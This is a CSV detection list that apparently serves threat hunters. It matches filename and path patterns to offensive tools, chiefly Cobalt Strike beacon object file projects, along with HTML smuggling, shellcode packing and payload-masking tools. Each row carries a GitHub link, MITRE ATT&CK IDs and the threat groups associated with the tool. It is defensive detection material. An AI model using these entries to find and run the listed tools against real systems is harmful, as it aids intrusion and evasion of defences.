"*/BobTheSmuggler.git*",".{0,1000}\/BobTheSmuggler\.git.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","5729"
"*/bof.cpp *",".{0,1000}\/bof\.cpp\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","5730"
"*/bof.h",".{0,1000}\/bof\.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","5731"
"*/BOF.NET/*",".{0,1000}\/BOF\.NET\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5732"
"*/bof.nim",".{0,1000}\/bof\.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","5733"
"*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5734"
"*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5735"
"*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5736"
"*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5737"
"*/bof/bof.c",".{0,1000}\/bof\/bof\.c","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5738"
"*/bof/bof.vcxproj*",".{0,1000}\/bof\/bof\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5739"
"*/bof/IABOF*",".{0,1000}\/bof\/IABOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","5740"
"*/bof/IAStart.asm*",".{0,1000}\/bof\/IAStart\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","5741"
"*/bof_reg_collect_parser.py*",".{0,1000}\/bof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5742"
"*/BOF-Builder*",".{0,1000}\/BOF\-Builder.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","5743"
"*/bof-collection/*",".{0,1000}\/bof\-collection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","5744"
"*/bofhound.git*",".{0,1000}\/bofhound\.git.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5745"
"*/bofhound.py*",".{0,1000}\/bofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","5746"
"*/BOFMask.git*",".{0,1000}\/BOFMask\.git.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","5747"
"*/bofmask.h*",".{0,1000}\/bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","5748"
